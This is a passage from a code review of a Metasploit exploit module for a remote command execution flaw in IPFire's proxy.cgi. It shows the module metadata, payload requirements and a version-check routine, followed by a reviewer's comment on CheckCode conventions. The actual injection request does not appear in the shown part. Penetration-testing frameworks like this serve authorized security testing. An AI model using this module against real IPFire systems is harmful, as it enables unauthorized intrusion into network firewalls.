modules/exploits/linux/http/ipfire_proxy_exec.rb

```diff
@@ -0,0 +1,117 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'IPFire proxy.cgi RCE',
+      'Description' => %q{
+        IPFire, a free linux based open source firewall distribution,
+        version < 2.19 Update Core 101 contains a remote command execution
+        vulnerability in the proxy.cgi page.
+      },
+      'Author'      =>
+        [
+          'h00die <mike@stcyrsecurity.com>', # module
+          'Yann CAM'                         # discovery
+        ],
+      'References'      =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/39765/' ],
+          [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true },
+      'Arch'           => [ ARCH_CMD ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'perl awk openssl',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 04 2016',
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class)
+  end
+
+  def check()
+    begin
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+      })
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i < 101
+        Exploit::CheckCode::Vulnerable
```

Comment:
Modules should only flag Exploit::CheckCode::Vulnerable when the vulnerable code is actually triggered. Versions checks should use Exploit::CheckCode::Appears. Please also see:

https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method